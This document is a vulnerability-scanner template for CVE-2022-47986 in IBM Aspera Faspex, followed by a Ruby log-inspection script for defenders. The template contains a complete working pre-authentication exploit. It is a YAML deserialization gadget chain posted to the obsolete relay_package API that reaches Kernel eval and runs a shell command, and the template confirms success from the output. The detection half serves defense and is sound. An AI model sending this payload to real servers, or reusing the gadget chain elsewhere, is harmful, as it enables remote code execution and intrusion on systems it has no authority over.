IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
fofa: app="Aspera-Faspex"
PoC code [publicly available]
id: CVE-2022-47986

info:
  name: Aspera Faspex Pre Auth RCE
  author: zan8in
  severity: critical
  verified: true
  description: |-
    IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
    fofa: app="Aspera-Faspex"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47986
  tags: cve,cve2022,aspera,faspex,rce,pre-auth
  created: 2023/10/30

set:
  randstr: randomLowercase(12)
  randstr4: randomLowercase(4)
  randstr8: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /aspera/faspex/package_relay/relay_package
      headers:
        Content-Type: application/json
      body: |
        {"package_file_list": ["/"], "external_emails": "\n---\n- !ruby/object:Gem::Installer\n i: x\n- !ruby/object:Gem::SpecFetcher\n i: y\n- !ruby/object:Gem::Requirement\n requirements:\n !ruby/object:Gem::Package::TarReader\n io: &1 !ruby/object:Net::BufferedIO\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\n read: 0\n header: \"pew\"\n debug_output: &1 !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/object:PrettyPrint\n output: !ruby/object:Net::WriteAdapter\n socket: &1 !ruby/module \"Kernel\"\n method_id: :eval\n newline: \"throw `id`\"\n buffer: {}\n group_stack:\n - !ruby/object:PrettyPrint::Group\n break: true\n method_id: :breakable\n", "package_name": "{{randstr4}}", "package_note": "{{randstr}}", "original_sender_name": "{{randstr}}", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": "{}", "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "{{randstr8}}", "delivery_title": "{{randstr4}}", "delivery_note": "{{randstr4}}", "delete_after_download": true, "delete_after_download_condition": "IDK"}
    expression: 'response.status == 500 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)'
expression: r0()
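
For defenders, the three indicators this template relies on (a POST to the obsolete relay_package path, Ruby object tags inside external_emails, and an HTTP 500 reply) can be checked in captured request logs. The following Ruby code is an added example, not part of the original template or of IBM's code; the log record shape, the function names and the sample records are assumptions constructed for illustration.

```ruby
require 'json'
require 'psych'

# Path taken from the template above; everything else here is illustrative.
RELAY_PATH = '/aspera/faspex/package_relay/relay_package'

# Return the Ruby-specific YAML tags found in +text+.
# Psych.parse_stream only builds a syntax tree; it never instantiates objects,
# so inspecting untrusted input this way is safe.
def ruby_yaml_tags(text)
  Psych.parse_stream(text).map(&:tag).compact.grep(%r{\A!ruby/}).uniq
rescue Psych::SyntaxError
  # Malformed YAML can still carry tags, so fall back to a textual scan.
  text.scan(%r{!ruby/[a-z]+(?::[\w:]+)?}).uniq
end

# Classify one logged request. The record shape (method/path/status/body)
# is a hypothetical format, not a Faspex log format.
def inspect_relay_request(rec)
  return nil unless rec[:method] == 'POST' &&
                    rec[:path].to_s.split('?').first == RELAY_PATH

  findings = ['POST to obsolete relay_package API']
  field = begin
    doc = JSON.parse(rec[:body].to_s)
    doc.is_a?(Hash) ? doc['external_emails'].to_s : ''
  rescue JSON::ParserError
    rec[:body].to_s # unparseable body: scan it whole
  end
  tags = ruby_yaml_tags(field)
  findings << "Ruby YAML tags in external_emails: #{tags.join(', ')}" unless tags.empty?
  findings << 'HTTP 500 response' if rec[:status] == 500
  { severity: tags.empty? ? :review : :high, findings: findings, tags: tags }
end

# Constructed sample records (not real traffic); the tag names a placeholder class.
SAMPLE_LOG = [
  { method: 'GET', path: '/aspera/faspex/', status: 200, body: '' },
  { method: 'POST', path: RELAY_PATH, status: 200,
    body: JSON.generate('external_emails' => 'ops@example.com') },
  { method: 'POST', path: RELAY_PATH, status: 500,
    body: JSON.generate('external_emails' => "---\n- !ruby/object:ExampleClass\n  a: 1\n") }
].freeze

SAMPLE_LOG.each { |rec| p inspect_relay_request(rec) } if __FILE__ == $PROGRAM_NAME
```

Because the advisory states that the API call was removed in Faspex 4.4.2 PL2, any request to this path is flagged for review even when no Ruby tags are present.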